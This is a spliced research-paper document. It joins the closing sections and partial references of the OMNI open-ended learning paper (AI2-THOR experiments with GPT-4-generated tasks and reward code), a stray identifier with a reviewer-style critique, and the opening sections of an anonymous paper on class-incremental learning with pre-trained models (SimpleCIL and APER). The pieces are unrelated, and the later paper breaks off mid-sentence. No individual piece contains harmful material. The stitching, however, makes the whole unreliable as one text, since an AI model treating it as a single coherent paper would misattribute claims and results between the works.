to them even though they are similar to other sampled tasks and might not expand the agent’s range of skills. **OMNI: Learning Progress + a Model of Interestingness.** To automatically select and focus on interesting tasks, an FM is prompted in a few-shot manner to predict which tasks are interesting. By combining LP with an MoI, OMNI focuses on the subset of high learning progress tasks that are interesting. In Crafter, the agent learns 82 (CI: 80 – 87) tasks (interesting or boring) and 14 (CI: 14 – 14) interesting tasks. The agent achieves an average task success rate of 0.56 (CI: 0.54 – 0.58) on interesting and boring tasks, and 0.78 (CI: 0.76 – 0.80) on interesting tasks only. In BabyAI, the agent learns 8 (CI: 7 – 10) tasks and achieves an average task success rate of 7.5e-3 (CI: 7.3e-3 – 7.7e-3) on all tasks. Across all metrics and in both domains, the differences in performance between OMNI and LP at 25%, 50%, 75%, and 100% of the way through training are statistically significant (all p < 1e-3, Mann Whitney U test), showing that OMNI significantly outperforms an LP-only curriculum (Figures 2 and 7). OMNI is not distracted by uninteresting yet learnable tasks, and focuses on the interesting tasks only (Figures 8 and 14). The trained agent not only achieves higher average task success rates, but also learns more challenging tasks faster (Figures 2 and 7). We thus know OMNI performs better than LP alone, but how good is it at predicting interesting tasks? To address this, we created an oracle for the MoI, termed the Oracle Model of Interestingness (OMoI). Impressively, the performance of the FM-based MoI is nearly on par with the oracle, suggesting that OMNI is highly effective in identifying interesting tasks for the agent to learn on (Appendix P). ## 5 EXPERIMENTS IN AN INFINITE TASK SPACE In truly open-ended settings, there are an infinite number of possible tasks. This section demonstrates OMNI in such a setting. Essential to training an agent capable of handling any task in such an open-ended learning framework is the development of a universal reward function, which can evaluate if any task has been completed or not. This section proposes an instantiation of OMNI that solves that problem by not only having FMs propose new, interesting tasks, but also by having the FM generate the code for a reward function that determines to what extent each proposed task has been performed. ### 5.1 METHODS In an infinite task space, it is impossible to evaluate every possible task to determine the agent’s learning progress. Hence, instead of using a predefined set of tasks, we use a pretrained autoregressive FM, GPT-4 (OpenAI [2023]), to generate learnable and interesting tasks throughout training. The LP curriculum then produces task sampling rates over this growing task set (Section 3.2). We input tasks that the agent can do well and tasks that the agent cannot do yet, then prompt GPT-4 in a zero-shot manner to suggest the next learnable and interesting tasks. Tasks done well are those completed with success rates greater than a predefined threshold (0.6 in AI2-THOR experiments). We also ask GPT-4 to output a sequence of environment states (in code format) that can be used to check whether or not the task has been successfully completed during training and evaluation. Appendix D shows the full prompt and Appendix E shows an example output. There are existing approaches that use FMs to generate code as reward functions (Kwon et al., 2023; Wang et al., 2023a; Yu et al., 2023). This version of OMNI integrates the generation of the task and the code requirements for task completion into a single output. This integrated approach ensures that every generated task comes with a comprehensive definition of what constitutes its completion (in code format). This approach can work for any domain in which one can run code to make queries about the underlying state. We apply OMNI to a complex, embodied robotics kitchen domain, AI2-THOR (Kolve et al., 2017), and show that OMNI is not only able to continuously generate learnable and interesting tasks, but also learns more tasks over time than controls. 5.2 AI2-THOR ENVIRONMENT ![AI2-THOR environment and results.](image) **Figure 3:** AI2-THOR environment and results. (Left) Agent’s egocentric view and bird’s-eye view in an AI2-THOR kitchen environment. (Right) OMNI learns more tasks than the Learning Progress and Uniform sampling baselines. Example tasks learned by OMNI are shown in gray boxes. AI2-THOR (Kolve et al., 2017) is an embodied 3D domain characterized by its near photo-realistic environment (Figure 3). We train our methods on an AI2-THOR kitchen floorplan. The environment contains many objects commonly found in a real kitchen, such as food (e.g., apple, bread), appliances (e.g., coffee machine, microwave), and tools (e.g., mug, pan). The agent has 13 discrete actions: MoveAhead, RotateRight, RotateLeft, LookUp, LookDown, Pickup, Put, Open, Close, ToggleOn, ToggleOff, Slice, and FillWithLiquid. We simplify the action mechanics that require a target object as an argument (e.g., the Pickup action, which requires a target object like Cup). Rather than force the agent to specify one of an infinite number of possible objects, instead, if the object mentioned in the current task is visible and requires the action to be applied to it to complete the task, it is automatically designated as the target object. If not, the target defaults to the visible object nearest to the agent. The agent’s observation includes 300 x 300 RGB pixel observations of a 90° field of view, and a description of the task in natural language (embedded with a look-up table and GRU, Appendix N). The agent receives a +1 reward, with a small penalty of 0.001 for each time step, when it has successfully completed the given task. A task can be described in natural language or by a sequence of environment states. For the agent to complete a given task, it needs to sequentially achieve a list of environment states (specified in code). For example, if the task is “Pick up an apple, then put it down”, the corresponding code format could be `[[obj_attributes("Apple", "isPickedUp": True)], [obj_attributes("Apple", "isPickedUp": False)]]`, whereby the agent has to achieve the first environment state where the apple is picked up, then achieve the second environment state where the apple is not picked up. The task space is infinite, as there is no restriction on the number of attributes to check for in each environment state, or the length of environment states to be achieved sequentially when specifying each task. The complexity and variability of tasks and interactions in AI2-THOR are significant, yet represent only a fraction of the possibilities of a Darwin Complete environment generator, meaning one that can create any possible learning environment (Clune, 2019). By demonstrating OMNI in this infinite AI2-THOR task space, we mark a step towards that ultimate, lofty goal of generating learnable and interesting tasks in a search space that includes any conceivable environment. 5.3 RESULTS AI2-THOR RL agents are trained with PPO (Schulman et al., 2017), a standard RL algorithm. Policy details and hyperparameters are in Appendix N. We compare the performance of agents trained with: (1) Uniform sampling (Appendix I.1), (2) LP, the Learning Progress curriculum over a growing task set where random tasks are added (Appendix I.2), and (3) OMNI, which is the Learning Progress curriculum applied over a growing task set where interesting and learnable tasks suggested by the FM are added (Section 5.1). Uniform sampling, the control, uniformly samples any task within the task space. Uniform sampling is naive and samples tasks that are too difficult for the agent most of the time, hurting learning (before even factoring in whether the tasks are worth learning). LP samples tasks based on the calculated learning progress weights (Section 3.2), but most tasks added to the task set are too difficult. OMNI automatically generates learnable and interesting tasks for the agent to learn on. All experiments are run for 1 million time steps and are repeated 10 times with different random seeds. Each experiment takes ~24 hrs on a 24GB NVIDIA A10 GPU with 30 virtual CPUs. In this vast landscape of infinite potential tasks, it is impossible to evaluate on every conceivable task. Hence, each method is only evaluated on tasks that have ever been sampled before. We measure our methods by the number of tasks completed at a success rate greater than a predetermined threshold (here, 0.6). All confidence intervals are 95% median bootstrap confidence intervals obtained by resampling 1000 times. Confidence intervals are reported with the following notation: stat (CI: lower – upper) where stat is the median across runs. Shaded areas in graphs also indicate the 95% median bootstrap confidence interval obtained by resampling 1000 times. Uniform Sampling. As expected, the results with uniform sampling are poor. The agent trained with Uniform sampling learns 0 (CI: 0 – 2) tasks (defined here and other treatments as a conditional success probability of at least 0.6). Learning Progress Baseline. Although the LP curriculum allows the agent to focus on the learnable tasks within the task set, because the tasks added to the task set are often too difficult, the agent does not learn many tasks either. The agent trained with LP learns 2 (CI: 0 – 3) tasks. OMNI. To automatically generate and learn interesting tasks, an FM is prompted in a zero-shot manner to suggest the next new learnable and interesting tasks, augmenting the task set for the agent to train on. The agent trained with OMNI learns 13 (CI: 11 – 17) tasks. The difference in performance between OMNI and both baselines (Uniform sampling and LP baseline) at 25%, 50%, 75%, and 100% of the way through training are statistically significant (all p < 1e-3, Mann Whitney U test), showing that OMNI significantly outperforms both Uniform sampling and the LP baseline (Figure 3). 6 DISCUSSION, FUTURE WORK, AND CONCLUSION In conclusion, our work demonstrates the potential of using an MoI to significantly enhance auto-curricula and the quest for open-ended learning algorithms by intelligently focusing on learnable and interesting tasks. OMNI addresses the Achilles Heel of open-ended systems, which lies in defining and quantifying interestingness, as previous attempts have resulted in pathologies when optimizing against such definitions and quantifications. OMNI mitigates this problem by leveraging human notions of interestingness to guide AI systems. There are numerous ways to implement the principles of this new paradigm, and exploring different versions presents an exciting avenue for future research (Appendix U). The generality and applicability of OMNI to other open-ended domains with vast task spaces further underscores its significance. In the long run, it hints at a synergy between FMs and open-endedness that simultaneously addresses looming challenges for both: how will FMs ultimately rise to the level of creativity seen in the best of human innovation, and how will open-endedness overcome the trap of diverging into a vast space of uninspiring mediocrity? By playing off each other’s strengths, FMs can perhaps someday become essential engines of open-ended discovery and begin to participate in the creative dance that has defined civilization since its inception. ACKNOWLEDGMENTS This work was supported by the Vector Institute, the Canada CIFAR AI Chairs program, a grant from Schmidt Futures, an NSERC Discovery Grant, and a generous donation from Rafael Cosman. We also thank Andrew Dai, Cédric Colas, and members in our lab at the University of British Columbia, namely Aaron Dharna, Ben Norman, and Shengran Hu, for insightful discussions and feedback. REFERENCES Michael Ahn, Anthony Brohan, Noah Brown, Yevgen Chebotar, Omar Cortes, Byron David, Chelsea Finn, Keerthana Gopalakrishnan, Karol Hausman, Alex Herzog, et al. Do as i can, not as i say: Grounding language in robotic affordances. *arXiv preprint arXiv:2204.01691*, 2022. Ilge Akkaya, Marcin Andrychowicz, Maciek Chociej, Mateusz Litwin, Bob McGrew, Arthur Petron, Alex Paino, Matthias Plappert, Glenn Powell, Raphael Ribas, et al. Solving rubik’s cube with a robot hand. *arXiv preprint arXiv:1910.07113*, 2019. Mihael Ankerst, Markus M Breunig, Hans-Peter Kriegel, and Jörg Sander. OPTICS: Ordering points to identify the clustering structure. *ACM Sigmod record*, 28(2):49–60, 1999. Arthur Aubret, Laetitia Matignon, and Salima Hassas. A survey on intrinsic motivation in reinforcement learning. *arXiv preprint arXiv:1908.06976*, 2019. Joshua E Auerbach and Josh C Bongard. Evolving CPPNs to grow three-dimensional physical structures. In *Proceedings of the 12th annual conference on Genetic and evolutionary computation*, pp. 627–634, 2010. Yuntao Bai, Saurav Kadavath, Sandipan Kundu, Amanda Askell, Jackson Kernion, Andy Jones, Anna Chen, Anna Goldie, Azalia Mirhoseini, Cameron McKinnon, et al. Constitutional AI: Harmlessness from AI feedback. *arXiv preprint arXiv:2212.08073*, 2022. Adrien Baranes and Pierre-Yves Oudeyer. Active learning of inverse models with intrinsically motivated goal exploration in robots. *Robotics and Autonomous Systems*, 61(1):49–73, 2013. Marc Bellemare, Sriram Srinivasan, Georg Ostrovski, Tom Schaul, David Saxton, and Remi Munos. Unifying count-based exploration and intrinsic motivation. *Advances in neural information processing systems*, 29, 2016. Yoshua Bengio, Jérôme Louradour, Ronan Collobert, and Jason Weston. Curriculum learning. In *Proceedings of the 26th annual international conference on machine learning*, pp. 41–48, 2009. Rishi Bommasani, Drew A Hudson, Ehsan Adeli, Russ Altman, Simran Arora, Sydney von Arx, Michael S Bernstein, Jeannette Bohg, Antoine Bosselut, Emma Brunskill, et al. On the opportunities and risks of foundation models. *arXiv preprint arXiv:2108.07258*, 2021. Nick Bostrom. Existential risks: Analyzing human extinction scenarios and related hazards. *Journal of Evolution and technology*, 9, 2002. Herbie Bradley, Andrew Dai, Hannah Teufel, Jenny Zhang, Koen Oostermeijer, Marco Bellagente, Jeff Clune, Kenneth Stanley, Grégory Schott, and Joel Lehman. Quality-Diversity through AI Feedback. *arXiv preprint arXiv:2310.13032*, 2023. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Shaofei Cai, Zihao Wang, Xiaojian Ma, Anji Liu, and Yitao Liang. Open-world multi-task control through goal-aware representation learning and adaptive horizon prediction. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition*, pp. 13734–13744, 2023. Andres Campero, Roberta Raileanu, Heinrich Küttler, Joshua B Tenenbaum, Tim Rocktäschel, and Edward Grefenstette. Learning with amigo: Adversarially motivated intrinsic goals. *arXiv preprint arXiv:2006.12122*, 2020.
mrRbIcyouU
* Concatenating features does not ensure true adaptability to new classes, as it might lead to a model that is more of an ensemble of old and new knowledge rather than a seamlessly adapted model, raising the following concerns: (3) Lack of Interaction Between Old and New Knowledge: The concatenation approach lacks a mechanism for interaction between the old knowledge (represented by the PTM’s features) and the new knowledge (represented by the adapted model’s features). Adaptability might require a more dynamic integration of old and new knowledge, allowing the model to restructure its internal representations in light of new information.
REVISITING CLASS-INCREMENTAL LEARNING WITH PRE-TRAINED MODELS: GENERALIZABILITY AND ADAPTIVITY ARE ALL YOU NEED Anonymous authors Paper under double-blind review ABSTRACT Class-incremental learning (CIL) aims to adapt to emerging new classes without forgetting old ones. Traditional CIL models are trained from scratch to continually acquire knowledge as data evolves. Recently, pre-training has achieved substantial progress, making vast pre-trained models (PTMs) accessible for CIL. Contrary to traditional methods, PTMs possess generalizable embeddings, which can be easily transferred for CIL. In this work, we revisit CIL with PTMs and argue that the core factors in CIL are adaptivity for model updating and generalizability for knowledge transferring. 1) We first reveal that frozen PTM can already provide generalizable embeddings for CIL. Surprisingly, a simple baseline (SimpleCIL) which continually sets the classifiers of PTM to prototype features can beat state-of-the-art even without training on the downstream task. 2) Due to the distribution gap between pre-trained and downstream datasets, PTM can be further cultivated with adaptivity via model adaptation. We propose AdaPt and mERge (APER), which aggregates the embeddings of PTM and adapted models for classifier construction. APER is a general framework that can be orthogonally combined with any parameter-efficient tuning method, which holds the advantages of PTM’s generalizability and adapted model’s adaptivity. 3) Additionally, considering previous ImageNet-based benchmarks are unsuitable in the era of PTM due to data overlapping, we propose four new benchmarks for assessment, namely ImageNet-A, ObjectNet, OmniBenchmark, and VTAB. Extensive experiments validate the effectiveness of APER with a unified and concise framework. 1 INTRODUCTION With the advancement of deep learning, deep models have achieved impressive feats in many fields (He et al., 2016; Simonyan & Zisserman, 2014; Tan et al., 2020). However, most research focuses on recognizing a limited number of classes in static environments. In the real world, applications often deal with streaming data with incoming new classes (Gomes et al., 2017). To address this issue, Class-Incremental Learning (CIL) has been proposed, which allows the model to learn from the evolving data and continuously build a unified classification model. Nevertheless, when new classes are added sequentially, the notorious catastrophic forgetting occurs (French, 1999), which erases the previously learned knowledge. Many prior works (Li & Hoiem, 2017; Masana et al., 2022; De Lange et al., 2021) are designed to continually build a holistic embedding without forgetting. While typical methods assume that the model is “trained from scratch,” recent advancements in pre-training (Han et al., 2021) have made Pre-Trained Models (PTMs) more accessible for designing models in downstream tasks. These PTMs are often trained on massive corpus (Radford et al., 2021) or countless images (Deng et al., 2009; Ridnik et al., 2021) with handcrafted tricks (Steiner et al., 2021), resulting in strong generalizability. Consequently, several methods (Wang et al., 2022e; Villa et al., 2022) propose to leverage PTM for better incremental learning. Powerful PTMs alleviate the burden of the learning process, substantially surpassing the performance upper bound of non-PTM-based methods (Zhou et al., 2023a). However, upon revisiting the objective of CIL, we find essential differences between these protocols. Without PTMs, CIL models are trained from random initialization to continually acquire the knowledge of new classes and build a unified embedding space, which requires the adaptivity for sequential updating. In contrast, PTMs are trained with massive datasets, which makes it easier to achieve an ideal knowledge and embedding space with strong generalizability. Take the human learning process for an example; non-PTM methods aim to teach an infant to grow up and continually acquire knowledge through college, while PTM-based methods teach an experienced adult to do the same thing, which is much easier. To evaluate the generalizability of PTMs, we formulate a CIL task using the VTAB (Zhai et al., 2019) dataset and test the performance of state-of-the-art PTM-based methods (Wang et al., 2022d,e) with a pre-trained ViT-B/16-IN1K in Figure 1. As a comparison, we present a simple baseline SimpleCIL to evaluate the quality of the pre-trained features. With the pre-trained embedding function frozen, SimpleCIL sets the classifier weights to the average embeddings (Snell et al., 2017) of each new class for classification. If PTMs already possess generalizable features, directly matching the average pattern to each query instance could also achieve competitive results. Surprisingly, we find that SimpleCIL outperforms the current SOTA by 5% even without any tuning on these downstream tasks, verifying its strong generalizability in knowledge transfer. Although PTMs are generalizable for CIL, a domain gap may still exist between pre-trained and incremental datasets (Zhou et al., 2022b; You et al., 2020). For instance, the ImageNet pre-trained model may not generalize well to out-of-distribution (Hendrycks et al., 2021b) or specialized tasks (Alfassy et al., 2022). Under such circumstances, freezing the embedding for knowledge transferring is not a “panacea.” Accordingly, adaptivity becomes essential to enable the model to grasp task-specific features. Nevertheless, sequentially tuning the PTM will harm the structural information and weaken the generalizability (Kumar et al., 2022), leading to the irreversible forgetting of previous knowledge. Is there a way to unify the generalizability of PTM with the adaptivity of the adapted model? In this paper, we present AdaPt and mERge (APER) for class-incremental learning, which employs PTM to enhance generalizability and adaptivity in a unified framework. To improve adaptivity, we adapt the PTM in the first incremental stage via parameter-efficient tuning. Adapting the model helps to obtain task-specific features and fills the domain gap between PTM and incremental data. We then concatenate the adapted model with the PTM to extract average embeddings as the classifier, thereby maintaining generalizability. APER restricts model tuning in the first stage, striking a balance between adaptivity and generalizability. Moreover, typical ImageNet-based CIL benchmarks are unsuitable for evaluation due to overlapping between pre-trained and downstream tasks. Therefore, we benchmark PTM-based CIL with four new datasets that have large domain gaps with the pre-trained data. Extensive experiments under various settings demonstrate the effectiveness of APER. 2 RELATED WORK Class-Incremental Learning (CIL): enables a learning system to continually incorporate new concepts without forgetting old ones (Zhou et al., 2023a). Typical CIL methods can be roughly divided into four categories. The first group saves and replays exemplars from old classes to recover former knowledge (Alijundi et al., 2019; Chaudhry et al., 2018; Iscen et al., 2020). The second group utilizes knowledge distillation to align the outputs of old and new models, thereby maintaining knowledge of old concepts (Li & Hoiem, 2017; Rebuffi et al., 2017b; Douillard et al., 2020; Zhang et al., 2020; Hu et al., 2021). The third group rectifies the inductive bias in the incremental model through normalization and logit/feature adjustment (Shi et al., 2022; Belouadah & Popescu, 2019; Pham et al., 2022). Lastly, other works expand the network when needed to enhance representation. ability (Yoon et al., 2018; Yan et al., 2021; Douillard et al., 2022; Wang et al., 2022a,d,e,b). CIL with PTM: is becoming a popular topic with the increasing prevalence of PTMs (Dosovitskiy et al., 2020; Radford et al., 2021). The aim is to sequentially adjust the PTM to stream data with new classes. L2P (Wang et al., 2022c) applies visual prompt tuning (Jia et al., 2022) to CIL based on the pre-trained Vision Transformer (Dosovitskiy et al., 2020) and learns a prompt pool to select the instance-specific prompt. DualPrompt (Wang et al., 2022d) extends L2P with general and expert prompts. Different from the key-value search in L2P, CODA-Prompt (Smith et al., 2023) improves the prompt selection process with an attention mechanism. (Wang et al., 2022c) explores the anchor-based energy self-normalization strategy to aggregate multiple pre-trained classifiers. When changing ViT into CLIP (Radford et al., 2021), (Wang et al., 2022b; Villa et al., 2022) extend L2P by learning prompts for both text and image modalities (Zhou et al., 2022c). Parameter-Efficient Tuning for PTM: aims to adapt the PTM to downstream tasks by tuning only a small number of (extra) parameters. Compared to fully finetuning, parameter-efficient tuning obtains competitive or even better performance at a much lower cost. VPT (Jia et al., 2022) prepends tunable prefix tokens (Li & Liang, 2021) to the input or hidden layers. LoRA (Hu et al., 2022) learns low-rank matrices to approximate parameter updates. (Houlsby et al., 2019; Chen et al., 2022a) learn extra adapter (Rebuffi et al., 2017a) modules with downsize and upsize projection. (Pfeiffer et al., 2021) merges the learned adapters with a fusion module. SSF (Lian et al., 2022) addresses the scaling and shifting operation for model tuning. Apart from additional modules in the network, (Bahng et al., 2022) proposes learning tunable parameters in the input space. Finally, (He et al., 2022a) formulates these works in a unified framework. 3 FROM OLD CLASSES TO NEW CLASSES Class-incremental learning aims to learn from an evolving data stream with new classes to build a unified classifier (Rebuffi et al., 2017b). There is a sequence of $B$ training tasks $\{D^1, D^2, \cdots, D^B\}$, where $D^b = \{(x_i^b, y_i^b)\}_{i=1}^{n_b}$ is the $b$-th incremental step with $n_b$ instances. Here, the training instance $x_i^b \in \mathbb{R}^D$ belongs to class $y_i^b \in Y_b$, where $Y_b$ is the label space of task $b$. $Y_b \cap Y_{b'} = \emptyset$ for $b \neq b'$. During the $b$-th training stage, we can only access data from $D^b$ for model updating. This paper focuses on the exemplar-free CIL setting (Zhu et al., 2021; Wang et al., 2022c), where no historical data can be fetched for rehearsal. The goal of CIL is to incrementally build a unified model for all seen classes, i.e., acquiring knowledge from new classes and meanwhile preserving knowledge from former ones. The model’s capability is evaluated over all seen classes $Y_b = Y_1 \cup \cdots \cup Y_b$ after each incremental task. Formally, the target is to fit a model $f(x) : X \rightarrow Y_b$ that minimizes the empirical risk across all testing datasets: $$\sum_{(x_j, y_j) \in D^1 \cup \cdots \cup D^b} \ell(f(x_j), y_j),$$ where $\ell(\cdot, \cdot)$ measures the discrepancy between prediction and ground-truth label. $D^b$ denotes the testing set of task $b$. A good CIL model satisfying Eq. [1] has discriminability among all classes, which strikes a balance between learning new classes and remembering old ones. Following (Wang et al., 2022c,b), we assume the availability of a pre-trained model (e.g., a ViT (Dosovitskiy et al., 2020) or ResNet (He et al., 2016)) on ImageNet (Deng et al., 2009), which we use as the initialization of $f(x)$. For clarity, we decouple the deep model into two parts: $f(x) = W^\top \phi(x)$, where $\phi(\cdot) : \mathbb{R}^D \rightarrow \mathbb{R}^d$ is the embedding function and $W \in \mathbb{R}^{d \times |Y_b|}$ is the classification head. We denote the classifier for class $k$ as $w_k$: $W = [w_1, \cdots, w_{|Y_b|}]$. We refer to the features after pooling as $\phi(x)$ for convolutional networks. In a plain ViT, the input encoding layer transforms the image into a sequence of output features $x_c \in \mathbb{R}^{L \times d}$, where $L$ is the sequence length. We assume the first token in $x_c$ to be the $[\text{CLS}]$ token to simplify notation. $x_c$ is then fed into the subsequent layers (i.e., multi-head self-attention and MLP) to produce the final embeddings. We treat the embedded $[\text{CLS}]$ token as $\phi(x)$ for ViT. Adaptivity and Generalizability in CIL CIL with Adaptivity: Before introducing PTMs into CIL, models are trained from scratch to gradually acquire knowledge of new classes. The naive idea is to update the incremental model with cross-entropy loss, which equips the model with adaptivity to adapt to new tasks: $$L = \sum_{(x_i, y_i) \in D^b} \ell(f(x_i), y_i) + L_{reg},$$ where $L_{reg}$ stands for the regularization terms to resist forgetting, e.g., knowledge distillation (Hinton et al., 2015; Li & Hoiem, 2017) or parameter regularization (Kirkpatrick et al., 2017). **CIL with Generalizability:** With the introduction of PTM to CIL (Wang et al., 2022e), continual learners are born with generalizability, which can be directly transferred to downstream tasks without learning. Correspondingly, we define a simple baseline, **SimpleCIL**, to transfer PTM for incremental tasks. With the embedding function $\phi(\cdot)$ frozen throughout the learning process, we extract average embedding (i.e., prototype (Snell et al., 2017)) of each class: $$p_i = \frac{1}{K} \sum_{j=1}^{|D_i|} I(y_j = i)\phi(x_j),$$ (3) where $K = \sum_{j=1}^{|D_i|} I(y_j = i)$, and $I(\cdot)$ is the indicator function. The averaged embedding represents the most common pattern of the corresponding class. We set the prototype as the classifier, i.e., $w_i = p_i$, to directly adjust the PTM for CIL. SimpleCIL demonstrates competitive performance in Figure 1, confirming the strong generalizability of PTM. **Generalizability vs. Adaptivity:** Eq. [2] and Eq. [3] address different aspects of CIL models. The former aims to enhance the adaptivity by enabling the model to be gradually tuned. By contrast, the latter highlights the model’s generalizability by freezing it throughout the learning process. To understand their roles in CIL, we conduct an experiment on CIFAR100 with 20 incremental tasks and compare the performance of finetuning versus SimpleCIL. These methods are based on pre-trained ViT-B/16-IN21K, and we separately report the performance of new ($Y_b$) and old ($Y_{b-1}$) classes in Figure 2. Specifically, SimpleCIL relies on the without training on the target dataset. However, it can be further improved to grasp the task-specific features, and finetuning shows better performance in new classes with the help of adaptivity. However, finetuning suffers catastrophic forgetting of old classes since features are continually changing. To summarize, these characteristics are two core aspects of CIL — adaptivity enables the model to bridge the domain gap between pre-training and incremental learning, while generalizability encourages knowledge transfer from pre-training to incremental learning. Therefore, both of them should be cultivated to facilitate CIL. ### 4 APER: AdaPt and mERge PTMs for CIL Motivated by the potential for enhancing both generalizability and adaptivity, can we achieve these characteristics in a unified framework? Specifically, we aim to achieve this goal from two aspects. On the one hand, to bridge the domain gap between the PTM and downstream datasets, model adaptation is essential to move the PTM towards incremental data. On the other hand, since the adapted model may lose the generalizability of high-level features, we attempt to merge the adapted model and PTM into a unified network for future tasks. The merged embedding function is kept frozen throughout the incremental learning process, transferring the generalizable embedding of model sets to incoming new classes. In this way, generalizability and adaptivity are achieved in the unified framework. We first introduce the framework of APER and then discuss the specific techniques for model adaptation. #### 4.1 Training Procedure of APER Although PTMs have discriminating features, there may exist a significant domain gap between the pre-trained dataset and incremental data. For example, the PTM is optimized to capture the characteristics of classes in ImageNet, while the incremental data stream may correspond to specialized data that requires domain knowledge or has extensive concept drift from ImageNet. To bridge this gap, an adapting process can be developed with the incremental data: $$f^*(x) = F(f(x), D, \Theta),$$ (4) Figure 3: Illustration of APER. **Left**: the training protocol of APER. We adapt the PTM using the first stage training set $D^1$ and then concatenate the embedding functions of PTM and the adapted model to maintain generalizability and adaptivity. The aggregated embedding function $[\phi^*(\cdot), \phi(\cdot)]$ is frozen throughout the following stages, and we extract the prototypes via Eq. (6) to set the classifier. **Middle**: adapting pre-trained ViT for CIL. We provide VPT Deep/Shallow, Scale & Shift, and Adapter for model adaptation. **Right**: adapting pre-trained CNN for CIL. We provide BN tuning and Scale & Shift for model adaptation. APER is a general framework that can be orthogonally combined with these adapting techniques. Red modules in the figure are trainable, while gray ones are frozen. where the adapting algorithm $\mathcal{F}$ takes the current model $f(x)$ and the dataset $D$ as input. It optimizes the parameter set $\Theta$ and produces the adapted model $f^*(x)$ that gains the domain-specific knowledge in the corresponding dataset. We introduce the variations of $\mathcal{F}$ in Section 4.2. If we could obtain all the incremental training sets at once, adapting the model via $\mathcal{F}(f(x), D^1 \cup D^2 \cdots \cup D^B, \Theta)$ can transfer the knowledge from the PTM to the incremental dataset and grasp the task-specific features for better performance. However, since data in CIL arrive sequentially, we cannot hold all the training sets at once. Continuously adapting the model would consequently result in catastrophic forgetting (as shown in Figure 2(b)). Hence, a naive solution is to adapt the model only in the first incremental stage: $$f^*(x) = \mathcal{F}(f(x), D^1, \Theta).$$ Since $D^1$ is a subset of the incremental data stream, it also possesses domain-specific knowledge that could facilitate model adaptation. The tuning process enhances the adaptivity of the CIL model, and the next question is to ensure generalizability. Since Eq. (5) forces the original generalizable feature to become more specialized to the downstream task, high-level features irrelevant to $D^1$ shall be overwritten and forgotten. Therefore, a better solution is to concatenate the features extracted by the PTM and the adapted model, i.e., $[\phi^*(x), \phi(x)]$, where $\phi^*(x)$ and $\phi(x)$ stand for the adapted and pre-trained embedding functions, respectively. To maintain generalizability, we freeze the concatenated embedding functions $[\phi^*(\cdot), \phi(\cdot)]$ after adaptation and extract prototypes for the following classes: $$p_i = \frac{1}{K} \sum_{j=1}^{|\mathcal{D}|} I(y_j = i)[\phi^*(x_j), \phi(x_j)],$$ where $K = \sum_{j=1}^{|\mathcal{D}|} I(y_j = i)$. Compared to Eq. (3), Eq. (6) contains additional information from the adapted model, which incorporates domain-specific features for better recognition. These prototypes reveal the most common patterns from the adapted and pre-trained models, ensuring both generalizability and adaptivity. We directly adopt the class prototype as the classifier weight, i.e., $w_i = p_i$, and utilize a cosine classifier for classification: $f(x) = (\frac{W}{||W||_2})^\top (\frac{[\phi^*(x), \phi(x)]}{||[\phi^*(x), \phi(x)]||_2})$. Based on the similarity between instance embedding and class prototype, it assigns a higher probability to the class with a more similar prototype. **Effect of Adapt and Merge:** We give the visualizations of APER in Figure 3(left). Although $D^1$ is a subset of the entire training set, adapting with it still helps transfer the PTM from the upstream dataset to the downstream task. The adapting process can be viewed as a further pre-training procedure, which adapts the PTM to the incremental dataset and bridges the domain gap. By merging the embedding functions of the PTM and the adapted model, the extracted features are more representative than any one of them alone. Additionally, since the model is only trainable in the first incremental task, the efficiency of APER is comparable to SimpleCIL, which does not require sequential tuning. On the other hand, since the model is frozen in the subsequent tasks, it does not suffer catastrophic forgetting of former concepts. We give the pseudo-code of APER in Algorithm 1. In the extreme case where the adaptation process in Eq. (5) does nothing to the PTM, APER will degrade to SimpleCIL, which guarantees the performance lower bound. 4.2 ADAPTING THE PTM To bridge the distribution gap between the pre-trained and incremental datasets, APER’s performance depends on the effective adapting algorithm \( F \). In this section, we discuss six specializations of \( F \) in APER that can handle different types of PTMs, such as ViTs and CNNs. **Fully Finetune**: is a naive idea when transferring the model to downstream tasks. It involves tuning all parameters in the adapting process, i.e., \( \Theta = \theta_\phi \cup \theta_W \), and minimizing the discrepancy between the model’s output and the ground truth: \[ \min_{\theta_\phi \cup \theta_W} \sum_{(x_j, y_j) \in D^+} \ell(f(x_j), y_j). \] However, the tuning cost could be relatively high for large-scale PTMs, e.g., ViTs. Therefore, some parameter-efficient tuning techniques can alleviate the tuning cost and be better solutions. **Visual Prompt Tuning (VPT)** (Jia et al., 2022): is a lightweight tuning technique for adapting ViTs, which only prepends some learnable prompts \( P \in \mathbb{R}^{p \times d} \) to form the extended features \([P, x_e]\), where \( x_e \) is the encoded features of the input image. The extended features are then fed into the subsequent layers of ViT to calculate the final embeddings. There are two variations of VPT: **VPT-Deep**, which prepends the prompts at every attention layer, and **VPT-Shallow**, which only prepends the prompts at the first layer. During optimization, it freezes the pre-trained weights in the embedding function and optimizes these prompts and classification head, i.e., \( \Theta = \theta_P \cup \theta_W \). **Scale & Shift (SSF)** (Lian et al., 2022): aims to adjust the feature activation by scaling and shifting. It appends an extra SSF layer after each operation layer (i.e., MSA and MLP) and adjusts the output of these operations. Given the input \( x_i \in \mathbb{R}^{L \times d} \), the output \( x_o \in \mathbb{R}^{L \times d} \) is formulated as: \[ x_o = \gamma \otimes x_i + \beta, \] where \( \gamma \in \mathbb{R}^d \) and \( \beta \in \mathbb{R}^d \) are the scale and shift factors, respectively. \( \otimes \) is Hadamard product (element-wise multiplication). The model optimizes the SSF layers and classifier, i.e., \( \Theta = \theta_{SSF} \cup \theta_W \), to trace the features of new tasks. **Adapter** (Houlsby et al., 2019; Chen et al., 2022a): is a bottleneck module which contains a down-projection \( W_{down} \in \mathbb{R}^{r \times d} \) to reduce the feature dimension, a non-linear activation function, and an up-projection \( W_{up} \in \mathbb{R}^{r \times d} \) to project back to the original dimension. We follow (Chen et al., 2022a) to equip the original MLP structure in ViT with the adapter. Denote the input of the MLP layer as \( x_e \), the output of AdaptMLP is formatted as: \[ \text{MLP}(x_e) + \text{ReLU}(x_e W_{down}) W_{up}. \] With pre-trained weights frozen, it optimizes the adapter and classification head, i.e., \( \Theta = \theta_{W_{down}} \cup \theta_{W_{up}} \cup \theta_W \). **Batch Normalization Tuning**: If the PTM is a convolutional network, e.g., CNNs, we can adjust the BN (Ioffe & Szegedy, 2015) parameters. Since the running mean and variance in BN 